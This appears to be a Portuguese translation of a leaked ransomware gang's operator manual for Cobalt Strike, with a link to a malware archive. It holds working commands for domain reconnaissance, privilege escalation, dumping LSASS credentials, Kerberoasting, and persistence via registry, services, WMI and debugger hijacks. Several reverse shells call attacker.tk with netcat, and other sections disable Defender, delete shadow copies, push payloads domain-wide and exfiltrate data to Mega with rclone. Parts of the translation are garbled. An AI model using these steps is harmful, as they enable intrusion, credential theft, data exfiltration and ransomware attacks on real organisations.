https://github.com/vxunderground/Malware...Conti.c.7z

: Senha: infectado

TÉCNICAS MANUAIS ANTES DE IMPLANTAR RANSOMWARE
Destina-se a usuários do CobaltStrike, mas também pode ser aplicado por meio de muitos RATs.

! -------------------------------------------------- --Comandos padrão---------------------------------------------- -----!
Criando uma carga
Ataques->Pacotes->

interagir - escolha um agente
help -> mostrará uma lista de comandos
help [command] mostrará ajuda para um comando específico

!--------------- --------------------------------------Coleta de informações AD--------- -------------------------------------------------- !

!---Obtendo um controlador de domínio---!
net domain_controllers
net dclist
shell nltest /dclist

!---Obtendo uma lista de computadores---!
shell net group "Domain Computers" /domain
net computer
net view
Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem !--Test--!

!---Obtendo uma lista de subdomínios---!
net domain_trusts
shell nltest /DOMAIN_TRUSTS

!---Obtendo uma lista de grupos e usuários---!
shell net group "domain Admins" /domain - lista de administradores de domínio; para alemães - shell net group "Domänen-Admins" /domínio
shell net group "Enterprise Admins" /domain - Administradores corporativos
shell net group "domain users" /domain - list Domain users
net group
net local group
net user

!---Adicionalmente---!
domínio líquido | informações do sistema | findstr /B "Domínio" - Mostra em qual domínio o PC está nas
sessões de rede - Mostra as sessões ativas no
tempo de rede do PC - Mostra a hora nos
logons de rede do PC - Mostra listas de usuários conectados ao PC

!---Obtendo o ShareFinder---!
net share - Mostrar lista de compartilhamentos no PC

Coletamos os compartilhamentos disponíveis e verificamos se há algum compartilhamento $ADMIN disponível para nosso usuário atual no domínio.
- powershell-import /opt/PowerSploit-dev/Recon/PowerView.ps1
-powershell Invoke-ShareFinder -CheckShareAccess -Verbose
Analog:
-powershell-import /opt/PowerSploit-dev/Recon/ShareFinder.ps1

- psinject 4728 x86 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt
(no momento, o escaneamento foi finalizado e seu resultado está sendo gravado em um arquivo, o arquivo estará totalmente dimensionado quando o escaneamento terminar e poderá ser baixado)

Além disso, não se esqueça de olhar os processos usando o comando ps, você pode encontrar o usuário lá, migrar para o processo dele> Explorar> Lista de processos> e depois selecionar o processo de outro usuário.
Depois de migrar para um novo usuário, você também precisa remover as bolas para ver onde pode romper com ele
Ao remover os compartilhamentos, ao final da remoção para o diretório C:\ProgramData e houver sh.txt oushares.txt , faça o download, veja quantos "administradores remotos" existem na caixa de texto, se houver mais de um, isso significa que há acesso a outro computador

!---Ferramenta adicional---!

!-Coleta de informações sobre a composição do Active Directory usando AdFind.exe-!
- carregue adfind.exe e adf.bat em uma pasta gravável
- mova o sinalizador Cobalt Strike para esta pasta
- execute shell adf.bat
- espere o script terminar
- baixe o resultado e exclua o que foi carregado na máquina

conteúdo adf.bat :

adfind.exe -f "(objectcategory=person)" > ad_users.txt
adfind.exe -f "objectcategory=computer" > ad_computers.txt
adfind.exe -f "(objectcategory=organizationalUnit)" > ad_ous.txt
adfind.exe -sc trustdmp > trustdmp.txt
adfind.exe -subnets -f (objectCategory= subnet)> subnets.txt
adfind.exe -f "(objectcategory=group)" > ad_group.txt
adfind.exe -gcb -sc trustdmp > trustdmp.txt

!-Coletando informações sobre o carro atual usando SeatBelt-!
- execute-assembly /opt/cobalt_strike_extension_kit/exe/Seatbelt.exe -group=all -outputfile="C:\ProgramData\textinfo.txt"
(não dou explicações aqui, o número de verificações é decente e todos os as informações coletadas são mais ou menos importantes tanto na máquina local quanto na rede)

! -------------------------------------------------- ----------Métodos de escalonamento de privilégios------------------------------------ ------------------!

!---Use exploits---!
shell systeminfo - Obtém informações sobre o sistema.
As informações recebidas devem ser gravadas em um arquivo de texto (win10-systeminfo.txt)
Use o Windows-Exploit-Suggester, ele mostrará aproximadamente quais exploits usar.

!---Atualizando banco de dados de exploits---!
/windows-exploit-suggester.py --update

[*]initiating...
[*]url base solicitado com sucesso
[*]scraped ms download url
[+] gravando no arquivo 2021-03-09-mssb.xls
[*] pronto
!---Execute o programa para detectar exploits---!
./windows-exploit-suggester.py --database 2021-03-09-mssb.xls --systeminfo win10-systeminfo.txt

Além disso, de acordo com a lista de exploits que emitiram o Windows-Exploit-Suggester, nós o usamos no máquina. (Mas antes disso, é melhor ler sobre o exploit que você deseja usar, pode não ser adequado para o seu objetivo, preste atenção especial à versão do sistema operacional e sua profundidade de bits.) Por exemplo:
Opção
número 1:
elevar ms16-135 [listener] - o comando usa o exploit ms16-135 e, se for bem-sucedido, invocará uma nova sessão em SYSTEM.

Opção número 2:
Por exemplo, vamos para este diretório C:\Users\User1\Pictures (você pode ir para qualquer outro diretório, o principal é que você pode baixar a carga) Carregando sua carga upload artefato.exe|dll
| One-liner
runasadmin ms16-032 (Especificar diretório) artefato.exe [Opção se necessário] o comando usa o exploit ms16-032 para executar sua carga sob SISTEMA. Nesse caso, você receberá um novo agente em SISTEMA.

!---SharpUp---!
SharpUp é um scanner de configuração incorreta para escalonamento de privilégios.
Fazendo uma varredura:
- execute-assembly /opt/cobalt_strike_extension_kit/exe/SharpUp.exe
Exemplo de saída (talvez não haja nada para encontrar):

=== SharpUp: executando verificações de escalonamento de privilégios ===

=== Serviços modificáveis ​​===
Nome :VMtools
DisplayName :VMware Tool
Discription : Fornece suporte para sincronizar objetos entre o host e o sistema operacional qwest.
Estado: Parado
Modo de início: Automático
PathName :C:\Program Files\VMware\VMware Tools\vmtoolsd
=== Binários de serviço modificáveis ​​===

===AlwaysInstallElevated Registry Keys===

=== Pastas modificáveis ​​em %PATH% ===

=== Execuções automáticas de registro modificáveis ===

=== Privilégios de usuário *especiais* ===

=== Arquivos de instalação autônoma ===

=== Arquivos McAfee Sitelist.xml ===

=== Senha do GPP em cache ===

Vemos que nosso usuário pode modificar o serviço VMtools para iniciar a carga.
Vá para Ataques --> WindowsExecutable (S) --> selecione nosso [Listener] e emita o Windows Service EXE --> Generate -->FileName:vmtoolsd.exe --> Save Em seguida, vamos
para qualquer diretório, por exemplo: C:\Users\User1\Pictures e carregue nosso load.
Agora modificamos o serviço:
execute sc config vmtoolsd binpath=C:\Users\User1\Pictures\vmtoolsd.exe
execute start vmtoolsd.exe
Depois disso, o agente de SISTEMA deve vir.

!------------------------------------------------ Obtendo hashes e senhas---------------------------------------------- --------!

(PODE SER EXECUTADO SEM PRIVILÉGIOS)
!----ataque kerberoast - obtendo hashes da memória---!

Realizamos um ataque kerberoast:
- execute-assembly /opt/cobalt_strike_extension_kit/exe/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt
- execute-assembly / opt/cobalt_strike_extension_kit/exe/Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt
- baixe os arquivos resultantes (se eles derem o resultado)
- se não for emitido, usaremos um script powershell alternativo para realizar o ataque:
- powershell-import /opt/PowerSploit-dev\Recon\PowerView.ps1
Analógico:
- powershell -importar /opt/PowerSploit-dev\Recon\Invoke-Kerberoast.ps1
- psinject 4728 x86 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -encoding UTF8
4728 neste caso é o pid atual e x86 é sua profundidade de bits
(hashes recebidos serão enviados para bruto para obter senhas de texto não criptografado ou serão usado no contexto dos direitos do SISTEMA)

Coletamos informações do navegador Chrome
- execute-assembly /opt/cobalt_strike_extension_kit/exe/SharpChrome.exe logins /showall
(aqui temos um conjunto de senhas para o usuário atual e uma ideia da rede e dos recursos externos para onde ele vai)

Verificando senhas salvas na política de grupo de domínio arquivos
- execute-assembly /opt/cobalt_strike_extension_kit/exe/Net-GPPPassword.exe
Analógico:
- powershell-import /opt/PowerSploit-dev/Exfiltration/Get-GPPPassword.ps1

(SOMENTE COM DIREITOS PRIVILEGIADOS*)

Se tivermos direitos PRIVILEGIADOS, podemos obter hashes e senhas usando os comandos "hashdump" e "logonpasswords". Esta é uma maneira rápida de obter senhas, mas pode não funcionar. Por exemplo, AV interfere.
É melhor fazer isso:
- Faça ps e encontre o processo LSASS.exe (Ele armazena nossas senhas). Lembre-se do PID.
- Faça uma lixeira.
Vamos ao beacon:
- cd Windows
- shell rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\Users\User1\lsass.dmp full
- No parâmetro PID, especifique o número PID de LSASS .exe
- Você pode usar qualquer diretório onde a escrita seja permitida, por exemplo: C:\Users\User1\lsass.dmp
Analog:
- execute-assembly /opt/cobalt_strike_extension_kit/exe/SharpDump.exe
Ao fazer um dump, baixe-o .
Uma vez baixado, abra o mimikatz em sua máquina e execute os seguintes comandos. (lsass.dmp colocado na pasta mimikatz)
sekurlsa::minidump lsass.dmp
securlsa::logonPasswords

! -------------------------------------------------- -----Persistência-------------------------------------------- ------------------!
(PODE SER EXECUTADO SEM PRIVILÉGIOS)
Crie explorers.bat e adicione este código (não copie os colchetes):
}
@echo off
set fullname=C:\Temp\explorers.exe
set prog=explorers.exe
:begin
tasklist /fi " IMAGENAME eq %prog%"|>nul find "%prog%"||start "" "%fullname%"
>nul ping 127.1 -n 6
goto :begin
}
Em seguida, carregue nosso arquivo explorers.exe load e explorers.bat em lote para qualquer diretório onde você pode gravar arquivos, por exemplo: "C:\Users\User1\Pictires"
Em seguida,
Executamos o comando (ele ocultará nossos arquivos):
shell attrib +h [explorers.exe]
shell attrib +h [explorers.bat]
Em seguida, adicione as chaves ao registro:
shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\Run" /v explorers /t REG_SZ /d "C:\Temp\explorers.exe"
shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v explorers /t REG_SZ /d "C: \Temp\explorers.bat"
Exame:
shell reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /s
----------------------- ---------------------- ------------------------ ---------------------- ------------------------ ----------
Você pode usar o powershell stager, mas se executar como um usuário normal, a janela cmd aparecerá na área de trabalho e fechará imediatamente
{
@echo off
set fullname=powershell.exe
set paramtr= powershell -nop -w hidden -encodedcommand.. .(seu stager)
setprog=powershell.exe
:begin
tasklist /fi "IMAGENAME eq %prog%"|>nul find "%prog%"||start "" "%fullname%" "" "%paramtr%" >
nul ping 127.1 -n 6
goto :begin
}
Em seguida, adicione a chave ao registro:
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v explorers /t REG_SZ /d "C:\Temp\explorers.bat "
Exame:
reg Query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /s

Além disso, a chave no registro pode ser gravada neste diretório reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, mas para criar uma chave neste diretório você precisa de DIREITOS DE PRIVILEGIO * !---Na memória

--- !
A introdução de um backdoor que travará na RAM faz sentido se você precisar se firmar na máquina de destino sem deixar rastros. Os antivírus geralmente têm pouco controle sobre a atividade da memória, pois isso está associado a um grande consumo de recursos adicionais. Mesmo um usuário experiente dificilmente notará algo que está oculto dentro de um processo legal.
Usaremos o meterpreter como um backdoor na memória. Este é talvez o RAT mais famoso, capaz de operar exclusivamente na memória sem mexer no disco.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=8888 -f raw -o meter32.bin exitfunc=thread StagerRetryCount=999999 cmd$> inject_windows.exe PID meter32.bin

Pagamos pelo sigilo máximo com a perda de persistência após uma reinicialização.
Como o encadeamento malicioso está sendo executado fora de qualquer biblioteca, o Procexp geralmente mostra esse encadeamento como sendo executado a partir do endereço zero.

office
Este método é adequado se o usuário atacado costuma trabalhar com o pacote de escritório. Não é tão raro!
reg add "HKCU\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d C:\users\username\meter.dll

Prós: Sobrevive à reinicialização, qualquer usuário serve.
Contras: Intervalo de inicialização não gerenciado.
(SOMENTE COM DIREITOS PRIVILEGIADOS*)

!---Fixando via "Agendador de Tarefas"---!
A correção através do Agendador de Tarefas será feita através da importação do nosso xml finalizado.
1) execute o script Python finalizado e gere xml.
Este script exigirá que você insira vários parâmetros:
- start programm - é isso que executará esta tarefa, powershell.exe | artefato.exe | rundll32.exe
- stager PowerShell ou outros parâmetros - parâmetros passados ​​para o programa executar, para powershell.exe - stager PowerShell, artefato.dll [Parâmetro]
- tarefa de registro de data - data de registro de tarefa, você pode ver outra tarefa que deseja disfarçar como.
- data final da tarefa - data final da tarefa
- tempo de repetição da tarefa no dia - após quanto tempo a tarefa será repetida, "PT3M" - a cada 3 minutos; "PT1R" - a cada hora; se o programa estiver em execução, a tarefa não iniciará uma nova sessão do programa.
- name_xml - nome do seu xml, use nomes como: Adobe Update, WindowsDefender, etc...
Depois disso, o xml necessário é gerado. Em seguida, baixamos para o PC cliente no qual queremos obter uma posição.
Depois disso, vamos para o diretório onde carregamos nosso xml e inserimos o comando no beacon:
shell schtasks /Create /RU SYSTEM /XML Security_Update.xml /TN WinDefender
Depois disso, excluímos o xml, não precisamos mais dele.
rm Security_Update.xml

!---Serviços---!
Use serviços para persistência, pois o Service Manager reiniciará automaticamente o serviço, se necessário.

shell sc criar persistência binPath= "nc.exe -e \windows\system32\cmd.exe attacker.tk 8888" start= auto
shell sc falha persistência reset= 0 ações= reiniciar/60000/restart/60000/restart/60000
shell sc start persistence

Prós: Sobrevive à reinicialização, intervalo de inicialização gerenciável, qualquer usuário está bem.
Menos: são necessários direitos de administrador.

!---Configurações---!
Organizar a persistência alterando a configuração do sistema operacional é uma ótima maneira de se esconder do antivírus. Este é o único caso em que não usamos nenhum código executável. Mas isso só se aplica se tivermos acesso direto à máquina de destino.
Criar um usuário oculto em nome do qual você pode obter acesso remoto é talvez a variante mais famosa desse ataque.

net user attacker p@ssw0rd /add
net localgroup administrators /add attacker
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v attacker /t REG_DWORD /d 0 /f Injeção de favoritos fácil e

eficiente no Windows via RDP:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t reg_sz /d "\windows\system32\cmd.exe" reg add "
HKLM \system\currentcontrolset\control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0x0 /f

Prós: difícil de detectar por antivírus, sobrevive a reinicializações.
Contras: requer direitos de administrador/root, não adequado se a máquina estiver atrás de um NAT ou firewall.

!---Depurador---!
Se o invasor souber que o usuário atacado geralmente inicia algum programa, digamos uma calculadora, ele pode injetar seu código no corpo desse programa usando um joiner. No entanto, qualquer intervenção em arquivos executáveis ​​aumenta inexoravelmente o nível de desconfiança em relação a eles por parte do antivírus. Uma implementação muito mais elegante seria interceptar o lançamento:
copycalc.exe _calc.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe" /v Debugger /t reg_sz /d " cmd /C _calc.exe & c:\windows\nc.exe -ec: \windows\system32\cmd.exe attacker.tk 8888" /f

Assim que a vítima iniciar e fechar a calculadora, o invasor aceitará um shell reverso.

Mais: sobrevive a uma reinicialização.
Menos: requer direitos de administrador.

!---Gflags---!
Da mesma forma, você pode organizar seu código para ser executado quando o usuário fechar um determinado programa.
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512 reg add "
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad. exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "nc -e
\windows\system32\cmd.exe attacker. tk 8888"

Mais:
Menos: requer direitos de administrador.

O Autoruns não detecta esse método, mas você pode verificar a ramificação do registro:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit

!---WMI---!
Uma maneira bastante confiável de execução automática é por meio de eventos WMI. Podemos lançar o backdoor em intervalos regulares.
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="persistence", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="persistence", ExecutablePath="C:\users\admin\meter.exe",
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="persistence"", Consumer="CommandLineEventConsumer.Name="persistence""

Prós: Sobrevive à reinicialização, intervalo de inicialização gerenciável.
Menos: requer direitos de administrador.

!---AppInit---!
O Windows tem uma maneira interessante de injetar bibliotecas em aplicativos em janelas usando AppInit (eles devem usar user32.dll).
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t reg_dword /d 0x1 /f reg
add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t reg_sz / d "c:\caminho\para\meter64.dll" /f
reg add "HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t reg_dword /d 0x1 /f reg add "HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v
AppInit_DLLs /t reg_sz /d "c:\path\to\meter32.dll" /f

Além disso: sobrevive a uma reinicialização.
Contras: Requer direitos de administrador, intervalo de inicialização não gerenciado.

!---Lsass---!
Outra possibilidade é registrar a biblioteca no processo do sistema lsass. Este é um local bastante vantajoso, pois as próprias contas que extraímos com o utilitário mimikatz são armazenadas neste processo.
reg add "HKLM\system\currentcontrolset\control\lsa" /v "Pacotes de notificação" /t reg_multi_sz /d "rassfm\0scecli\0meter" /f Além disso: sobrevive a uma reinicialização

.
Contras: Requer direitos de administrador, intervalo de inicialização incontrolável, pode matar o sistema.

!---Winlogon---!
Para abrir um shell sempre que um usuário fizer login, você pode usar o mecanismo Winlogon.
reg add "HKLM\software\microsoft\windows nt\currentversion\winlogon" /v UserInit /t reg_sz /d "c:\windows\system32\userinit.exe,c:\windows\meter.exe" Plus: sobrevive a uma

reinicialização .
Contras: Intervalo de inicialização não gerenciado.

!---Netsh---!
O utilitário de configuração de rede Netsh também permite carregar uma biblioteca arbitrária. Isso abre a possibilidade de organizar um carregamento automático improvisado por meio dele. O resultado parecerá inócuo, pois o componente do sistema Windows é inicialmente chamado.
cmd#> c:\windows\syswow64\netsh.exe
netsh> add helper c:\windows\meter32.
cmd#> reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v persistence /t REG_SZ /d "C:\Windows\SysWOW64\netsh.exe" Como resultado, obtemos a seguinte cadeia: autorun

→ netsh.exe → meter.dll.
Nesse caso, o meter.dll ficará oculto aos olhos do usuário - ele verá apenas o lançamento do Netsh legítimo, um componente nativo do Windows.

Prós: Sobrevive à reinicialização, difícil de detectar pelo usuário.
Menos: requer direitos de administrador.

! -------------------------------------------------- ---Movimento lateral--------------------------------------------- -------------!

Se conseguirmos obter o login e a senha do usuário no PC da vítima, fazemos spawnas Domain\Admin Password [listener], um novo agente virá, o processo será iniciado sob este usuário.

Se encontramos o login \ senha do domínio admin ou usuário, podemos pegar seu token, o comando fica assim
- make_token Domain\Admin Pass
se você deseja remover o token, o comando:
-rev2self

Vá para o menu Cobalt Strike -->Visualização-->Tabela de destino ou clique no ícone de destino.
É aqui que seus alvos estarão localizados depois que você fizer isso (net dclist, net domain_controllers, net computer, portscan)
Clique com o botão direito do mouse no PC para o qual deseja ir --> Jump:
psexec
psexec64
psexecpsh
ssh
ssh key
winrm
winrm64

Se o agente tiver um processo do sistema, você pode elevar os direitos do sistema usando o comando getsystem.
Se encontramos o nome de usuário e o hash do usuário e, ao mesmo tempo, não conseguimos descriptografar o hash, emitimos o seguinte comando pth Domain\Admin hash [comando]
(são necessários direitos privilegiados), usando os comandos:
-shell dir \ \ip
- hostname\c$
verifica o acesso ao servidor ou PCs normais.
Se houver acesso, clique na sessão> File Browser> escreva o caminho \\ip ou o nome do computador ao qual você tem acesso \c$ , carregue o load lá
shell wmic /node:[ip] process call create "rundll32.exe C:\Temp\artifact.dll StartW"
shell wmic /node:[ip] process call create "C:\Temp\artifact.exe"

!-------------- ------------------------------------Ataques------------- ------------------------------------------------!
!--BASTÃO--!
sempre execute tudo como administrador:
uac - remove a janela pop-up pedindo permissão para executar do admin
defoff - mata o defensor (não funciona em tudo, depois verificamos a presença do processo Mspeng no taskmgr)
RDP - aumenta a porta 3389

del - excluir cópia de sombra (solicita permissão para excluir, pressione - y)
NS - monta unidades de sistema ocultas (pass:98) !! use após a demolição AB

NLA+BACK - corrige NLA+backdoor para login sem senha, funciona assim:
na janela de login (onde pede para inserir créditos) - pressione win + Y, uma janela cmd aparece
escreva taskmgr, abra a guia de usuários , RMB em qualquer usuário - conecte
ps - não funciona em dezenas \ requer um passe

COLETANDO UM BAT MANUAL PARA COPIAR UM ARQUIVO DE TODO O DOMÍNIO
start PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMÍNIO\ADMINISTRADOR -p SENHA cmd /c COPIAR "\\PRIMARY CONTROLLER DOMAIN\share$\ fx166.exe" "C:\windows\temp\ "
SALVAR COMO "COPY.BAT"

COLETANDO UM ARQUIVO BAT PARA INICIAR UM ARQUIVO EM TODO O DOMÍNIO
start PsExec.exe -d @C:\share$\comps1.txt -u DOMÍNIO\ADMINISTRADOR -p SENHA cmd /cc:\windows\temp\fx166.exe
SALVAR COMO "EXE.BAT"

COLETANDO UMA BATERIA WMI PARA COPIAR E EXECUTAR O ARQUIVO EM TODO O DOMÍNIO
start wmic /node:@C:\share$ \comps1.txt /user:"DOMAIN\Administrator" /password:"PASSWORD" process call create "cmd.exe /c bitsadmin /transfer fx166 \\DOMAIN CONTROLLER\share$\ fx166.exe %APPDATA%\fx166.exe&%APPDATA%\fx166.exe"

! -------------------------------------------------- -------RDP------------------------------------------ ------------------------!
SE O RDP FOR MUITO NECESSÁRIO NA LAN LOCAL :: COMO NÃO DORMIR ::
1. Selecione o sistema operacional do servidor, ping, encontrado. Fazendo uma listagem de dira
`ls \\REMOTE-HOSTNAME\C$\Users`
Sort by Modified. Onde há um toque fresco - é DEFINITIVAMENTE IMPOSSÍVEL ir abaixo desses usuários, porque facilmente surgirá a seguinte situação - você entra, baixa bolas / testa algo e de repente esse usuário chega a este PC e vê os resultados do seu trabalho ... Detectar. Limpeza. Fim do jogo.
Para fazer isso, selecione o usuário que foi para este servidor no ano passado, digamos.
Você acha que a mecânica está clara?
2. Selecionando um usuário do SIM que trava no SIM, mas quase nunca é usado

shell net group "Domain Admins" /domain

Esta é uma lista do nosso SIM
A seguir, no usuário, revezamos removendo as informações
`shell net user Administrador / domínio`
Estamos procurando a linha do último logon - ou seja, quando você fez login na rede pela última vez (em qualquer um dos PCs da grade) Se houver uma data como penúltimo mês, meio ano ou finalmente um ano - excelente. Isso é o que precisamos. Provavelmente, esta é uma conta de serviço ou um administrador para o qual eles não vão e definitivamente não interferirá no seu RDP.

Esses truques simples ajudarão você a não dormir estupidamente no RDP

3. Não sentamos no RDP, depois de terminarmos - fazemos Logoff (OBRIGATÓRIO). Não deve ser confundido com simplesmente fechar a janela RDP.

!---------------------------------------------Material adicional-- -------------------------------------------------- ---!

!---MANUAL DO RCLONE--!
1. baixe o rclone do site., crie um arquivo rclone.conf e coloque na mesma pasta do exe
2. depois abra o cmd como administrador, vá até a pasta onde está o programa com o arquivo de configuração e execute o comando: rclone config
3. então aparece um menu no qual criamos uma configuração (grosso modo, inserimos o login e a senha do mega), após a inserção dos créditos, o programa os grava no arquivo rclone.conf, em criptografia forma.
4. pegamos o arquivo rclone.conf recebido e o próprio programa e colocamos no host de onde vamos extrair as informações, claro que é melhor colocá-lo em um local isolado 5. Vá para CS beacon para a
pasta onde você coloca a configuração e o programa e executa o comando:

shell rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12

remote:Data - mude apenas isso.
"remoto" é o nome do seu mega.
"NT" é seu diretório no mega onde será baixado, caso não exista, ele mesmo irá criar.

Bem, acho que está claro aqui, o que está entre aspas é o que estamos produzindo, podemos especificar como quiser, até mesmo o disco inteiro remoto - o nome da configuração, que especificamos ao executar a etapa 3, dados - o pasta no mega onde as informações são carregadas

!---SonicWall---!
para quem precisa trabalhar com o SonicWall por meio de sessões do navegador
Usando um navegador da Web para acessar

- pegue a sessão da saída do script, por exemplo "47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg="
- abra o navegador no modo anônimo, abra o console do desenvolvedor (js-console)
- codificar o ID da sessão em base64
>> btoa("47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER]
"NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="
- dirija no URL https://target (redirecione para https://target/cgi-bin/welcome )
- vá para o console em application/cookies, adicione uma
troca de cookie: NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0=
- no navegador (onde .. ./cgi-bin/welcome) edite o URL para https://target/cgi-bin/portal
- obtenha acesso ao recurso na sessão do usuário

!---Instalando e configurando o Citrix---!
----------------------------------
Windows 7 ou Windows 10
Na nee Internet Explorer 11 ou google chrome
Após ustanovki braruzera nastraivaem Citrix Workspace

For win 7: https://www.citrix.com/en-gb/downloads/w...2-ltsr-cu2 . html
Para win10: https://www.citrix.com/en-gb/downloads/w.../downloads /workspace-app/windows/workspace-app-for-windows-latest.htmla win 10:
https:// wwwcitrix.com/en-gb/downloads/w...atest.html

Install citrix
Dalee v brauzere vhodim v web-interface citrixa, vvodim login-pass potom zapuskaem deesktop (otkroetsya libo v browsere or v citrixAPP)

posle vhoda v desktop - podtyagivaem agenta v CS

!------------------------------------------- -----------Questões-------------------------------------- -----------------------!

14) Se você encontrar algum tipo de senha, também pode executá-la através do smb_login - esta é uma ferramenta do metasploit, vou emitir um metasploit e dizer como usá-lo. smb_login mostrará a quais servidores ou trabalhadores, há acesso com esses créditos

Como classificar AD coletado da rede
1) Baixe o FileZilla
2) Baixe o Putty, execute o Putty através do Tor
Acesse aqui https://www.torproject.org/download/ tor/
Baixar ATTENTION Expert Bundle
Descompacte, vá para o diretório Tor e execute tor.exe
Após alguns segundos, atingirá a escrita de 100% Concluído
Nas configurações do Putty, vá para o proxy, defina meias5, porta ip 127.0.0.1 9050
3) Passamos pelo filezilla até o servidor > vamos até o diretório "Script" - colocamos os arquivos AD ao lado do script
4) Vá até o Putty, vá até o servidor, vá até o diretório onde está o script, dê o comando
. /script.sh
5) Pronto, volte para o FilleZilla e pegue nosso arquivo classificado. Depois de você mesmo, certifique-se de excluir os arquivos AD e a pasta classificada, se a pasta classificada não for excluída, basta alterá-la para qualquer nome

manual no USERHANTER com a ajuda dela, encontramos esses carros. Também precisamos de ad_users para obter o SID de lá para o ticket dourado, mas falaremos mais sobre isso depois
. faça uma lista de alvos
1.1 Abrimos ad_users, estamos procurando alguém que seja potencialmente interessante para nós: admin / engenheiro / inform tecnólogos / TI
pegamos logins de conta de sAMAccountName
1.2 Pegamos uma lista de administradores de domínio
1.3 colocamos o primeiro e o segundo no arquivo list.txt

2. Appload power view.
2.1 powershell-import _/home/user/soft/powerview/view.ps1_
2.1 --comentário: importar power view de /home/user/soft/powerview/view.ps1

2.3 Ativar busca
2.3.1
psinject 1884 x64 Invoke- UserHunter -Threads 20 -UserFile C:\ProgramData\list.txt >> C:\ProgramData\out.txt

em vez de 1884 - o PID do processo onde temos direitos suficientes para injetar.
x64 - ou profundidade de bits x86 do processo. veja a lista de tarefas
Em c\programdata\list.txt deve haver uma lista que fizemos no ponto nº 1.
após 5-10-20 minutos, observe o resultado em out.txt. Assim que ele termina, ele reabastece de uma vez. ou seja, se o arquivo for 0 bytes, significa que funciona ou AB queimou (se queimou av, vai ver na caixinha)